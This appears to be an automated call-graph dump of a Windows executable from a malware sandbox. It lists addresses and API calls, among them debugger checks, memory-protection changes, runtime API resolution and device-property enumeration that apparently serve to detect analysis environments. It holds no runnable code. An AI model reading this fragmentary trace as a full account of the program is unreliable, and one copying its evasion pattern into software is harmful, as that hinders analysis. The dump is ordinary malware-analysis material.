531375 92489->92490 92491 5313b7 92489->92491 92492 53139b 92489->92492 92490->92492 92525 531382 92490->92525 92556 534b51 92491->92556 92553 51ea89 20 API calls _free 92492->92553 92494 5313a0 92554 51ea9c 20 API calls _free 92494->92554 92499 5335af _free 20 API calls 92502 5313d7 92499->92502 92500 5313a7 92555 51b518 26 API calls std::runtime_error::runtime_error 92500->92555 92501 531520 92504 531596 92501->92504 92507 531539 GetConsoleMode 92501->92507 92505 5335af _free 20 API calls 92502->92505 92506 53159a ReadFile 92504->92506 92508 5313de 92505->92508 92509 5315b4 92506->92509 92510 53160e GetLastError 92506->92510 92507->92504 92511 53154a 92507->92511 92512 531403 92508->92512 92513 5313e8 92508->92513 92509->92510 92516 53158b 92509->92516 92514 531572 92510->92514 92515 53161b 92510->92515 92511->92506 92517 531550 ReadConsoleW 92511->92517 92565 52c492 28 API calls __fread_nolock 92512->92565 92563 51ea9c 20 API calls _free 92513->92563 92534 5313b2 __fread_nolock 92514->92534 92566 51ea66 20 API calls 2 library calls 92514->92566 92569 51ea9c 20 API calls _free 92515->92569 92529 5315f0 92516->92529 92530 5315d9 92516->92530 92516->92534 92517->92516 92522 53156c GetLastError 92517->92522 92518 5335af _free 20 API calls 92518->92481 92522->92514 92523 5313ed 92564 51ea89 20 API calls _free 92523->92564 92524 531620 92570 51ea89 20 API calls _free 92524->92570 92540 53d99b 92525->92540 92531 531607 92529->92531 92529->92534 92567 530fce 31 API calls 3 library calls 92530->92567 92568 530e0e 29 API calls __fread_nolock 92531->92568 92534->92518 92535 53160c 92535->92534 92536->92458 92537->92461 92538->92463 92539->92458 92541 53d9b5 92540->92541 92542 53d9a8 92540->92542 92545 53d9c1 92541->92545 92575 51ea9c 20 API calls _free 92541->92575 92574 51ea9c 20 API calls _free 92542->92574 92544 53d9ad 92544->92501 92545->92501 92547 53d9e2 92576 51b518 26 API calls std::runtime_error::runtime_error 92547->92576 92549->92476 92550->92481 92551->92486 92552->92484 92553->92494 92554->92500 92555->92534 92557 534b8f 92556->92557 92561 534b5f __Toupper 92556->92561 92578 51ea9c 20 API calls _free 92557->92578 92559 534b7a RtlAllocateHeap 92560 5313ce 92559->92560 92559->92561 92560->92499 92561->92557 92561->92559 92577 52defa 7 API calls 2 library calls 92561->92577 92563->92523 92564->92534 92565->92525 92566->92534 92567->92534 92568->92535 92569->92524 92570->92534 92571->92479 92572->92484 92573->92481 92574->92544 92575->92547 92576->92544 92577->92561 92578->92560 93606 4082b0 93607 513ac7 std::_Facet_Register 8 API calls 93606->93607 93608 4082f1 GetCurrentProcessId PostMessageW 93607->93608 93668 533fe1 93669 534b51 std::_Locinfo::_Locinfo_dtor 21 API calls 93668->93669 93670 533ffc 93669->93670 93671 5335af _free 20 API calls 93670->93671 93672 534006 93671->93672 88056 43b0b0 88057 43b0ed 88056->88057 88067 43b0e6 shared_ptr 88056->88067 88076 408e10 88057->88076 88059 43b0ff __Getcvt 88087 43c990 88059->88087 88060 513805 _com_util::ConvertStringToBSTR 5 API calls 88061 43b20b 88060->88061 88065 43b14d 88066 43b156 GetProcAddress 88065->88066 88068 43b17f 88065->88068 88066->88068 88067->88060 88068->88067 88069 43b211 88068->88069 88070 51b528 std::runtime_error::runtime_error 26 API calls 88069->88070 88071 43b216 88070->88071 88107 4264f0 88071->88107 88077 408e36 88076->88077 88078 408e3d 88077->88078 88079 408e73 88077->88079 88080 408e96 88077->88080 88078->88059 88081 513ac7 std::_Facet_Register 8 API calls 88079->88081 88082 513ac7 std::_Facet_Register 8 API calls 88080->88082 88084 408e8b _Yarn 88080->88084 88083 408e84 88081->88083 88082->88084 88083->88084 88085 51b528 std::runtime_error::runtime_error 26 API calls 88083->88085 88084->88059 88086 408ed3 88085->88086 88133 414010 88087->88133 88090 408180 88091 408293 88090->88091 88092 4081b7 88090->88092 88091->88065 88093 408212 RtlEnterCriticalSection 88092->88093 88165 5139d3 5 API calls __Init_thread_wait 88092->88165 88095 40823c 88093->88095 88096 40826f RtlLeaveCriticalSection 88093->88096 88098 513ac7 std::_Facet_Register 8 API calls 88095->88098 88096->88065 88097 4081d6 88097->88093 88099 4081e2 RtlInitializeCriticalSection 88097->88099 88100 408243 __Getcvt 88098->88100 88166 513d5f 29 API calls __onexit 88099->88166 88162 46d3e0 LoadLibraryA 88100->88162 88102 4081fe 88167 513989 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 88102->88167 88106 40820f 88106->88093 88108 513ac7 std::_Facet_Register 8 API calls 88107->88108 88109 42653d 88108->88109 88168 4823e0 ResetEvent 88109->88168 88134 41402a _fread 88133->88134 88137 51e928 88134->88137 88140 51bed8 88137->88140 88139 414034 88139->88090 88141 51bee3 88140->88141 88142 51bef8 88140->88142 88156 51ea9c 20 API calls _free 88141->88156 88144 51bf3a 88142->88144 88147 51bf06 88142->88147 88160 51ea9c 20 API calls _free 88144->88160 88146 51bee8 88157 51b518 26 API calls std::runtime_error::runtime_error 88146->88157 88158 51b8d6 51 API calls 4 library calls 88147->88158 88150 51bef3 88150->88139 88151 51bf1e 88153 51bf4a 88151->88153 88159 51ea9c 20 API calls _free 88151->88159 88153->88139 88155 51bf32 88161 51b518 26 API calls std::runtime_error::runtime_error 88155->88161 88156->88146 88157->88150 88158->88151 88159->88155 88160->88155 88161->88153 88163 513805 _com_util::ConvertStringToBSTR 5 API calls 88162->88163 88164 408260 88163->88164 88164->88096 88165->88097 88166->88102 88167->88106 88169 48242d 88168->88169 88170 482403 GetExitCodeThread 88168->88170 88206 52519a 88169->88206 88171 482419 88170->88171 88172 482422 WaitForSingleObject 88170->88172 88171->88169 88171->88172 88172->88169 88207 5251a7 88206->88207 88208 5251bb 88206->88208 88944 44a570 88947 44a5a0 88944->88947 88946 44a57b shared_ptr 88950 44a5ee shared_ptr Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection 88947->88950 88948 44a71f 88949 51b528 std::runtime_error::runtime_error 26 API calls 88948->88949 88952 44a724 88949->88952 88950->88948 88951 44a6ce shared_ptr 88950->88951 88953 4822b0 31 API calls 88951->88953 88972 44a880 88952->88972 88955 44a701 88953->88955 88955->88946 89017 470690 88972->89017 88974 44a8e2 89023 471d90 88974->89023 88978 44a912 Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection 89030 47f270 88978->89030 89018 4706c6 89017->89018 89019 513ac7 std::_Facet_Register 8 API calls 89018->89019 89021 4706eb 89018->89021 89020 47071b 89019->89020 89020->89021 89132 472d90 89020->89132 89021->88974 89024 471da8 89023->89024 89024->89024 89164 471ac0 89024->89164 89026 44a90b 89027 470dd0 89026->89027 89028 470950 27 API calls 89027->89028 89029 470e04 Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection 89028->89029 89029->88978 89242 414c70 89030->89242 89135 4732d0 89132->89135 89138 4735c0 89135->89138 89139 4735de _DebugHeapAllocator 89138->89139 89142 473b10 89139->89142 89141 472da5 89141->89021 89145 473c80 89142->89145 89144 473b20 Concurrency::details::ContextBase::GetWorkQueueIdentity 89144->89141 89146 473cb7 Concurrency::details::ContextBase::GetWorkQueueIdentity 89145->89146 89149 473d80 89146->89149 89148 473cc4 construct swap 89148->89144 89150 473d90 allocator 89149->89150 89153 40d950 89150->89153 89152 473d99 89152->89148 89154 40d988 89153->89154 89155 40d95e 89153->89155 89154->89152 89156 513ac7 std::_Facet_Register 8 API calls 89155->89156 89157 40d96f 89156->89157 89158 40d983 89157->89158 89159 40d978 89157->89159 89160 51b49d std::runtime_error::runtime_error 26 API calls 89158->89160 89159->89152 89161 51b537 89160->89161 89162 51b545 __Getctype 11 API calls 89161->89162 89163 51b544 89162->89163 89165 471af8 89164->89165 89170 471b1e shared_ptr Concurrency::details::HardwareAffinity::operator!= std::_Mutex_base::~_Mutex_base Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection 89164->89170 89166 470690 27 API calls 89165->89166 89167 471b02 89166->89167 89168 470dd0 27 API calls 89167->89168 89168->89170 89173 471b93 std::_Mutex_base::~_Mutex_base Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection 89170->89173 89174 474080 89170->89174 89173->89026 89175 4740af swap 89174->89175 89184 470390 89175->89184 89177 4740bb swap 89188 470950 89177->89188 89180 474100 89181 474110 swap 89180->89181 89225 474490 89181->89225 89185 4703a4 89184->89185 89186 4703c7 89184->89186 89185->89186 89199 46fde0 89185->89199 89186->89177 89189 4709e9 89188->89189 89197 4709f3 89188->89197 89190 470a86 89189->89190 89194 470a08 89189->89194 89189->89197 89192 513ac7 std::_Facet_Register 8 API calls 89190->89192 89191 470bb9 89191->89180 89193 470a8d 89192->89193 89193->89197 89221 472d50 27 API calls 2 library calls 89193->89221 89194->89197 89211 46fea0 89194->89211 89197->89191 89197->89197 89222 4702b0 27 API calls Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection 89197->89222 89200 46fe11 _com_util::ConvertStringToBSTR 89199->89200 89201 46fe5f _Yarn 89200->89201 89209 408db0 27 API calls numpunct 89200->89209 89205 513805 _com_util::ConvertStringToBSTR 5 API calls 89201->89205 89203 46fe3d 89210 470160 27 API calls 3 library calls 89203->89210 89207 46fe94 89205->89207 89206 46fe4d 89208 408cf0 std::runtime_error::~runtime_error 26 API calls 89206->89208 89207->89186 89208->89201 89209->89203 89210->89206 89212 46feda _com_util::ConvertStringToBSTR 89211->89212 89213 46ff15 _Yarn 89212->89213 89223 408db0 27 API calls numpunct 89212->89223 89216 513805 _com_util::ConvertStringToBSTR 5 API calls 89213->89216 89215 46fef3 89224 470160 27 API calls 3 library calls 89215->89224 89218 46ff56 89216->89218 89218->89197 89219 46ff03 89220 408cf0 std::runtime_error::~runtime_error 26 API calls 89219->89220 89220->89213 89221->89197 89222->89197 89223->89215 89224->89219 89226 4744a2 swap 89225->89226 89231 474650 89226->89231 89237 475100 89231->89237 89238 475137 Concurrency::details::ContextBase::GetWorkQueueIdentity 89237->89238 89239 473d80 allocator 27 API calls 89238->89239 89243 414c80 89242->89243 89243->89243 89244 40b8f0 numpunct 27 API calls 89243->89244 89245 414c92 89244->89245 89246 47f2e0 89245->89246 89247 47f319 89246->89247 89248 47f3b7 89247->89248 89249 47f5e6 89247->89249 89250 47f4f4 89247->89250 89251 47f554 89247->89251 89252 47f35f 89247->89252 89253 47f40f 89247->89253 89254 47f339 89247->89254 89267 47f46b 89247->89267 89317 4714b0 22 API calls 89248->89317 89325 472150 27 API calls 7 library calls 89249->89325 89321 47ed00 27 API calls numpunct 89250->89321 89322 478a90 89251->89322 89310 471490 22 API calls 89252->89310 89319 47ecc0 52 API calls 89253->89319 89255 513805 _com_util::ConvertStringToBSTR 5 API calls 89254->89255 89257 47f78b 89255->89257 89261 47f3bf 89263 47f5f5 89264 47f367 89267->89254 89320 47edc0 80 API calls 5 library calls 89267->89320 89271 47f50c 89275 47f426 89279 47f4af 89310->89264 89317->89261 89319->89275 89320->89279 89321->89271 89329 40b8a0 89322->89329 89325->89263 90432 4519b0 90457 49c5e0 28 API calls 90432->90457 90434 4519e0 90435 4519e6 90434->90435 90438 451a02 __Getcvt 90434->90438 90436 513805 _com_util::ConvertStringToBSTR 5 API calls 90435->90436 90437 4519fc 90436->90437 90439 408180 43 API calls 90438->90439 90440 451a65 90439->90440 90441 451a6e GetProcAddress 90440->90441 90443 451a95 __Getcvt 90440->90443 90441->90443 90442 451b66 90444 513805 _com_util::ConvertStringToBSTR 5 API calls 90442->90444 90443->90442 90446 408180 43 API calls 90443->90446 90445 451b79 90444->90445 90447 451ac2 90446->90447 90448 451af3 90447->90448 90449 451acb GetProcAddress 90447->90449 90450 408050 43 API calls 90448->90450 90449->90448 90451 451b03 90450->90451 90452 451b0c GetProcAddress 90451->90452 90453 451b2e 90451->90453 90452->90453 90458 49ddf0 90 API calls 90453->90458 90455 451b4e CoTaskMemFree 90459 44cc70 90455->90459 90457->90434 90458->90455 90462 44cca9 90459->90462 90465 44cdc4 shared_ptr 90459->90465 90460 513805 _com_util::ConvertStringToBSTR 5 API calls 90461 44cdfb 90460->90461 90461->90442 90463 40b650 SimpleUString::operator= 27 API calls 90462->90463 90464 44ccdb 90463->90464 90475 44cd6c shared_ptr 90464->90475 90495 483090 29 API calls numpunct 90464->90495 90465->90460 90467 44cd07 __Getcvt 90496 51f098 90467->90496 90468 44ce06 90469 51b528 std::runtime_error::runtime_error 26 API calls 90468->90469 90471 44ce0b 90469->90471 90478 4345a0 90471->90478 90475->90465 90475->90468 90476 44ce01 90477 51b528 std::runtime_error::runtime_error 26 API calls 90476->90477 90477->90468 90505 43c1f0 90478->90505 90480 4345e7 90481 411780 std::generic_category 26 API calls 90480->90481 90484 4345f6 shared_ptr 90481->90484 90483 4347a6 90485 51b528 std::runtime_error::runtime_error 26 API calls 90483->90485 90484->90483 90515 4343e0 90484->90515 90495->90467 90497 51f0a5 90496->90497 90498 51f0b3 90496->90498 90497->90498 90501 51f0ca 90497->90501 90543 51ea9c 20 API calls _free 90498->90543 90500 51f0bb 90544 51b518 26 API calls std::runtime_error::runtime_error 90500->90544 90503 44cd3b 90501->90503 90545 51ea9c 20 API calls _free 90501->90545 90503->90475 90503->90476 90506 43c1fa 90505->90506 90509 43c24f shared_ptr 90505->90509 90507 43c210 90506->90507 90541 435a90 26 API calls 2 library calls 90506->90541 90507->90509 90510 51b528 std::runtime_error::runtime_error 26 API calls 90507->90510 90509->90480 90512 43c277 90510->90512 90511 43c2a9 shared_ptr 90511->90480 90512->90511 90513 51b528 std::runtime_error::runtime_error 26 API calls 90512->90513 90514 43c2d0 90513->90514 90516 434420 90515->90516 90518 43442c shared_ptr 90515->90518 90541->90506 90543->90500 90544->90503 90545->90500 87637 466cf0 87720 413a40 87637->87720 87639 466d25 87640 466d34 GetProcAddress 87639->87640 87641 466d5a GetModuleHandleW GetProcAddress 87639->87641 87640->87641 87643 466d86 GetCurrentProcess 87641->87643 87644 466d96 GetCurrentProcess 87641->87644 87643->87644 87646 413a40 43 API calls 87644->87646 87647 466dc6 87646->87647 87648 466dcf GetProcAddress 87647->87648 87649 466dfc CheckRemoteDebuggerPresent 87647->87649 87648->87649 87650 466e17 87649->87650 87654 466e40 __Getcvt 87649->87654 87651 413a40 43 API calls 87650->87651 87652 466e1c 87651->87652 87653 466e25 GetProcAddress 87652->87653 87652->87654 87653->87654 87737 468e20 87654->87737 87658 466f95 87661 466f9a KiUserExceptionDispatcher 87658->87661 87659 466f23 RtlEnterCriticalSection 87663 466f83 RtlLeaveCriticalSection 87659->87663 87664 466f53 87659->87664 87660 466ea5 87660->87658 87660->87659 87899 5139d3 5 API calls __Init_thread_wait 87660->87899 87813 48bdf0 87661->87813 87663->87658 87667 513ac7 std::_Facet_Register 8 API calls 87664->87667 87666 466ee8 87666->87659 87669 466ef4 RtlInitializeCriticalSection 87666->87669 87670 466f5d 87667->87670 87900 513d5f 29 API calls __onexit 87669->87900 87670->87663 87672 466f0c 87901 513989 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 87672->87901 87675 466fc7 87848 467280 87675->87848 87676 466f20 87676->87659 87721 413a77 87720->87721 87722 413b59 87720->87722 87723 413ad2 RtlEnterCriticalSection 87721->87723 87902 5139d3 5 API calls __Init_thread_wait 87721->87902 87722->87639 87724 413b35 RtlLeaveCriticalSection 87723->87724 87725 413afc 87723->87725 87724->87639 87727 513ac7 std::_Facet_Register 8 API calls 87725->87727 87729 413b06 __Getcvt 87727->87729 87728 413a96 87728->87723 87730 413aa2 RtlInitializeCriticalSection 87728->87730 87905 46c210 6 API calls _com_util::ConvertStringToBSTR 87729->87905 87903 513d5f 29 API calls __onexit 87730->87903 87732 413abe 87904 513989 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 87732->87904 87735 413acf 87735->87723 87736 413b26 87736->87724 87906 4552d0 87737->87906 87739 468e9e 87740 468ead GetProcAddress 87739->87740 87741 468ed9 SetupDiGetClassDevsW 87739->87741 87740->87741 87742 4697d9 87741->87742 87775 468ef5 __Getcvt 87741->87775 87743 513805 _com_util::ConvertStringToBSTR 5 API calls 87742->87743 87744 466e87 87743->87744 87744->87660 87778 4697f0 87744->87778 87745 468f23 GetProcAddress 87745->87775 87746 469610 87747 4552d0 43 API calls 87746->87747 87748 469785 87747->87748 87749 4697ce SetupDiDestroyDeviceInfoList 87748->87749 87750 46978e GetProcAddress 87748->87750 87749->87742 87750->87749 87751 4552d0 43 API calls 87751->87775 87752 468fc7 SetupDiGetDeviceRegistryPropertyA 87752->87775 87753 468f95 GetProcAddress 87753->87752 87755 46901f GetProcAddress 87755->87775 87756 51ac8c 26 API calls 87756->87775 87757 4690b9 GetProcAddress 87757->87775 87758 4690fc GetProcAddress 87758->87775 87759 46913f GetProcAddress 87759->87775 87760 469182 GetProcAddress 87760->87775 87761 4691c5 GetProcAddress 87761->87775 87762 469208 GetProcAddress 87762->87775 87763 46924b GetProcAddress 87763->87775 87764 46928e GetProcAddress 87764->87775 87765 4692d1 GetProcAddress 87765->87775 87766 469314 GetProcAddress 87766->87775 87767 469357 GetProcAddress 87767->87775 87768 408050 43 API calls 87768->87775 87769 4693a3 GetProcAddress 87769->87775 87770 4693f2 GetProcAddress 87770->87775 87771 469441 GetProcAddress 87771->87775 87772 469490 GetProcAddress 87772->87775 87773 4694df GetProcAddress 87773->87775 87774 46952e GetProcAddress 87774->87775 87775->87745 87775->87746 87775->87751 87775->87752 87775->87753 87775->87755 87775->87756 87775->87757 87775->87758 87775->87759 87775->87760 87775->87761 87775->87762 87775->87763 87775->87764 87775->87765 87775->87766 87775->87767 87775->87768 87775->87769 87775->87770 87775->87771 87775->87772 87775->87773 87775->87774 87776 46957d GetProcAddress 87775->87776 87777 4695c8 GetProcAddress 87775->87777 87923 524e26 87775->87923 87776->87775 87777->87775 87779 4552d0 43 API calls 87778->87779 87780 46986c 87779->87780 87781 4698a7 SetupDiGetClassDevsW 87780->87781 87782 46987b GetProcAddress 87780->87782 87783 469e92 87781->87783 87787 4698c3 __Getcvt 87781->87787 87782->87781 87784 513805 _com_util::ConvertStringToBSTR 5 API calls 87783->87784 87785 469e9f 87784->87785 87785->87660 87786 4698de GetProcAddress 87786->87787 87787->87786 87792 469982 SetupDiGetDeviceRegistryPropertyA 87787->87792 87793 469950 GetProcAddress 87787->87793 87794 524e26 46 API calls 87787->87794 87795 4552d0 43 API calls 87787->87795 87796 469a0c SetupDiGetDeviceRegistryPropertyA 87787->87796 87797 4699da GetProcAddress 87787->87797 87798 51ac8c 26 API calls 87787->87798 87799 469a74 GetProcAddress 87787->87799 87800 469d53 87787->87800 87801 469ab7 GetProcAddress 87787->87801 87802 469b16 StrStrIA 87787->87802 87803 469afa GetProcAddress 87787->87803 87804 469b3d GetProcAddress 87787->87804 87805 469b80 GetProcAddress 87787->87805 87806 408050 43 API calls 87787->87806 87807 469bc3 GetProcAddress 87787->87807 87808 469c06 GetProcAddress 87787->87808 87809 469c49 GetProcAddress 87787->87809 87810 469c8c GetProcAddress 87787->87810 87811 469ccf GetProcAddress 87787->87811 87812 469d0e GetProcAddress 87787->87812 87788 4552d0 43 API calls 87789 469e3e 87788->87789 87790 469e87 SetupDiDestroyDeviceInfoList 87789->87790 87791 469e47 GetProcAddress 87789->87791 87790->87783 87791->87790 87792->87787 87793->87792 87794->87787 87795->87787 87796->87787 87797->87796 87798->87787 87799->87787 87800->87788 87801->87787 87802->87787 87802->87800 87803->87802 87804->87787 87805->87787 87806->87787 87807->87787 87808->87787 87809->87787 87810->87787 87811->87787 87812->87787 87814 48bf61 NtProtectVirtualMemory 87813->87814 87815 48be36 87813->87815 87830 48bf76 _strstr 87814->87830 87816 48be8d RtlEnterCriticalSection 87815->87816 87942 5139d3 5 API calls __Init_thread_wait 87815->87942 87817 48bf4f RtlLeaveCriticalSection 87816->87817 87818 48bec1 87816->87818 87817->87814 87820 513ac7 std::_Facet_Register 8 API calls 87818->87820 87823 48bec8 LoadLibraryA 87820->87823 87821 48bfea 87824 513805 _com_util::ConvertStringToBSTR 5 API calls 87821->87824 87822 48be55 87822->87816 87825 48be61 RtlInitializeCriticalSection 87822->87825 87826 48bf3f 87823->87826 87827 48bf26 GetProcAddress 87823->87827 87828 466fa6 87824->87828 87943 513d5f 29 API calls __onexit 87825->87943 87826->87817 87827->87826 87835 40b8f0 87828->87835 87830->87821 87945 48c040 51 API calls 87830->87945 87831 48be79 87944 513989 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 87831->87944 87834 48be8a 87834->87816 87838 40b934 87835->87838 87839 40b90e SimpleUString::operator= 87835->87839 87836 40ba1e 87946 40de90 27 API calls SimpleUString::operator= 87836->87946 87838->87836 87841 40b988 87838->87841 87842 40b9ad 87838->87842 87839->87675 87843 513ac7 std::_Facet_Register 8 API calls 87841->87843 87844 513ac7 std::_Facet_Register 8 API calls 87842->87844 87845 40b999 _Yarn 87842->87845 87843->87845 87844->87845 87899->87666 87900->87672 87901->87676 87902->87728 87903->87732 87904->87735 87905->87736 87907 4553fc 87906->87907 87908 45531b 87906->87908 87907->87739 87909 455376 RtlEnterCriticalSection 87908->87909 87936 5139d3 5 API calls __Init_thread_wait 87908->87936 87911 4553d5 RtlLeaveCriticalSection 87909->87911 87912 4553a0 87909->87912 87911->87739 87914 513ac7 std::_Facet_Register 8 API calls 87912->87914 87913 45533a 87913->87909 87915 455346 RtlInitializeCriticalSection 87913->87915 87916 4553a7 87914->87916 87937 513d5f 29 API calls __onexit 87915->87937 87933 46d2c0 LoadLibraryA 87916->87933 87919 455362 87938 513989 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 87919->87938 87922 455373 87922->87909 87924 524e34 87923->87924 87925 524e56 87923->87925 87924->87925 87927 524e39 87924->87927 87941 524e6e 46 API calls 3 library calls 87925->87941 87939 51ea9c 20 API calls _free 87927->87939 87929 524e69 87929->87775 87930 524e3e 87940 51b518 26 API calls std::runtime_error::runtime_error 87930->87940 87932 524e49 87932->87775 87934 513805 _com_util::ConvertStringToBSTR 5 API calls 87933->87934 87935 4553c6 87934->87935 87935->87911 87936->87913 87937->87919 87938->87922 87939->87930 87940->87932 87941->87929 87942->87822 87943->87831 87944->87834 87945->87830 90546 46a5b0 90547 5165e0 __Getcvt 90546->90547 90548 46a5de GetModuleHandleW LoadCursorW RegisterClassExW GetModuleHandleW CreateWindowExW 90547->90548 90549 46a651 GetModuleHandleW FindResourceW 90548->90549 90550 46a703 90549->90550 90551 46a671 GetModuleHandleW SizeofResource 90549->90551 90585 52510e 90550->90585 90551->90550 90553 46a686 GetModuleHandleW LoadResource 90551->90553 90553->90550 90557 46a69b _Yarn __Getcvt 90553->90557 90555 513805 _com_util::ConvertStringToBSTR 5 API calls 90556 46a720 90555->90556 90558 46a6ba FreeResource 90557->90558 90566 490850 90558->90566 90560 46a6d1 90560->90550 90579 4909a0 90560->90579 90562 46a6e6 90562->90550 90600 49c5e0 28 API calls 90562->90600 90564 46a6f7 90564->90550 90601 49ddf0 90 API calls 90564->90601 90567 4908a9 90566->90567 90568 490859 90566->90568 90567->90560 90568->90567 90569 49085f CoInitialize 90568->90569 90602 4a1170 GetModuleHandleW LoadCursorW RegisterClassExW 90569->90602 90571 49086d 90572 513ac7 std::_Facet_Register 8 API calls 90571->90572 90573 490877 90572->90573 90574 4908a0 90573->90574 90603 49f900 90573->90603 90574->90560 90576 490885 90577 490899 90576->90577 90607 4a0cd0 90576->90607 90577->90560 90580 4909ab IsWindow 90579->90580 90581 4909ce 90579->90581 90580->90581 90582 4909b8 90580->90582 90581->90562 90582->90581 90755 49f9c0 90582->90755 90583 4909c9 90583->90562 90586 525130 90585->90586 90587 52511b 90585->90587 90589 5250c5 23 API calls 90586->90589 91204 51ea9c 20 API calls _free 90587->91204 90591 52513d 90589->90591 90590 525120 91205 51b518 26 API calls std::runtime_error::runtime_error 90590->91205 90592 525172 90591->90592 90593 525145 CreateThread 90591->90593 90599 525037 22 API calls 90592->90599 90595 525166 GetLastError 90593->90595 90596 525187 ResumeThread 90593->90596 91207 524f3b 90593->91207 91206 51ea66 20 API calls 2 library calls 90595->91206 90596->90592 90596->90595 90597 46a710 90597->90555 90599->90597 90600->90564 90601->90550 90602->90571 90604 49f931 90603->90604 90614 49b910 90604->90614 90606 49f98d __Getcvt 90606->90576 90608 4a0cdb 90607->90608 90609 4a0d18 90607->90609 90608->90609 90617 491810 90608->90617 90609->90577 90615 513ac7 std::_Facet_Register 8 API calls 90614->90615 90616 49b917 90615->90616 90616->90606 90666 491830 90617->90666 90667 513ac7 std::_Facet_Register 8 API calls 90666->90667 90670 491860 90667->90670 90669 491904 90673 4918d9 90670->90673 90676 4918e6 90670->90676 90675 51f098 ___std_exception_copy 26 API calls 90673->90675 90675->90676 90677 491660 40 API calls 2 library calls 90676->90677 90677->90669 90756 49f9ff IsWindow 90755->90756 90790 49fb6a 90755->90790 90757 49fa0e 90756->90757 90756->90790 90760 4c9950 27 API calls 90757->90760 90757->90790 90758 513805 _com_util::ConvertStringToBSTR 5 API calls 90759 49fb84 90758->90759 90759->90583 90761 49fa31 90760->90761 90762 4c9920 27 API calls 90761->90762 90763 49fa4e 90762->90763 90764 4c9920 27 API calls 90763->90764 90768 49fa55 shared_ptr 90764->90768 90765 49fad1 90766 408a10 26 API calls 90765->90766 90767 49fae0 90766->90767 90769 513ac7 std::_Facet_Register 8 API calls 90767->90769 90767->90790 90768->90765 90770 49fc18 90768->90770 90768->90790 90771 49faef 90769->90771 90772 51b528 std::runtime_error::runtime_error 26 API calls 90770->90772 90773 49fb0f 90771->90773 90870 496700 27 API calls 90771->90870 90774 49fc1d 90772->90774 90843 497640 90773->90843 90776 4a00c5 90774->90776 90778 49fc66 90774->90778 90779 513805 _com_util::ConvertStringToBSTR 5 API calls 90776->90779 90780 408050 43 API calls 90778->90780 90781 4a00df 90779->90781 90782 49fc6c 90780->90782 90781->90583 90873 46d980 6 API calls _com_util::ConvertStringToBSTR 90782->90873 90785 49fc73 90785->90776 90790->90758 90844 497673 90843->90844 90870->90773 90873->90785 91204->90590 91205->90597 91206->90592 91208 524f47 _Atexit 91207->91208 91209 524f5b 91208->91209 91210 524f4e GetLastError RtlExitUserThread 91208->91210 91211 534703 __Toupper 38 API calls 91209->91211 91210->91209 91212 524f60 91211->91212 91213 5334f2 _Atexit 10 API calls 91212->91213 91214 524f6b 91213->91214 91216 524f76 91214->91216 91230 533425 10 API calls 2 library calls 91214->91230 91223 46a500 91216->91223 91218 52521f 23 API calls 91219 524f9a 91218->91219 91231 52df90 20 API calls 2 library calls 91219->91231 91221 524fab 91224 46a59f 91223->91224 91225 46a50f WaitForSingleObject 91223->91225 91224->91218 91226 46a565 SendMessageW 91225->91226 91227 46a525 PostMessageW WaitForSingleObject 91225->91227 91226->91224 91228 46a580 91226->91228 91227->91226 91227->91227 91229 46a586 Sleep SendMessageW 91228->91229 91229->91224 91229->91229 91230->91216 91231->91221 93612 46a370 93613 46a391 93612->93613 93614 46a3a1 93613->93614 93615 46a47a 93613->93615 93618 46a3a3 93614->93618 93628 46a3c7 93614->93628 93616 46a4a1 93615->93616 93617 46a481 93615->93617 93619 46a4d4 93616->93619 93620 46a4a5 EnableWindow ShowWindow ShowWindow KiUserCallbackDispatcher 93616->93620 93631 513805 _com_util::ConvertStringToBSTR 5 API calls 93617->93631 93618->93617 93622 46a3b3 93618->93622 93624 513805 _com_util::ConvertStringToBSTR 5 API calls 93619->93624 93620->93619 93621 46a463 93625 513805 _com_util::ConvertStringToBSTR 5 API calls 93621->93625 93623 513805 _com_util::ConvertStringToBSTR 5 API calls 93622->93623 93626 46a3c1 93623->93626 93627 46a4e5 93624->93627 93629 46a474 93625->93629 93628->93621 93639 49c5e0 28 API calls 93628->93639 93632 46a49b 93631->93632 93633 46a412 __Getcvt 93633->93621 93640 43f340 51 API calls 93633->93640 93635 46a440 93641 49de80 121 API calls 2 library calls 93635->93641 93637 46a45b 93642 49ddf0 90 API calls 93637->93642 93639->93633 93640->93635 93641->93637 93642->93621 89666 482570 89667 48257e 89666->89667 89670 4825a0 89667->89670 89671 482759 89670->89671 89672 4825e1 89670->89672 89673 482763 RtlEnterCriticalSection 89671->89673 89688 482591 89671->89688 89674 4825e8 89672->89674 89675 48262f RtlEnterCriticalSection 89672->89675 89678 482799 numpunct 89673->89678 89679 482793 89673->89679 89681 4825f9 GetCurrentProcessId 89674->89681 89674->89688 89676 482660 RtlLeaveCriticalSection 89675->89676 89677 482673 numpunct 89675->89677 89676->89688 89699 482900 5 API calls SimpleUString::operator= 89677->89699 89700 482900 5 API calls SimpleUString::operator= 89678->89700 89680 482840 RtlLeaveCriticalSection 89679->89680 89680->89688 89682 48260d 89681->89682 89681->89688 89687 48261b SetEvent 89682->89687 89682->89688 89685 482693 GetTickCount 89689 4826a8 GetTickCount 89685->89689 89690 4826e5 GetCurrentProcessId PostMessageW 89685->89690 89686 4827b6 GetTickCount 89691 4827ee GetCurrentProcessId PostMessageW 89686->89691 89692 4827d1 GetTickCount 89686->89692 89687->89688 89689->89690 89693 4826bf GetTickCount SetTimer 89689->89693 89695 482717 SimpleUString::operator= 89690->89695 89694 48281c SimpleUString::operator= 89691->89694 89692->89691 89692->89694 89698 48271e RtlLeaveCriticalSection 89693->89698 89696 48283c 89694->89696 89697 48282e PostMessageW 89694->89697 89695->89698 89696->89680 89697->89696 89698->89688 89699->89685 89700->89686 89701 4d7d30 89702 4d7d3d 89701->89702 89704 4d7d44 89701->89704 89705 4d7e10 89702->89705 89708 4d8000 89705->89708 89707 4d7e1d 89707->89704 89709 4d8018 89708->89709 89710 4d8014 89708->89710 89711 4d805e 89709->89711 89718 4ddfa0 53 API calls 89709->89718 89710->89707 89714 4d8079 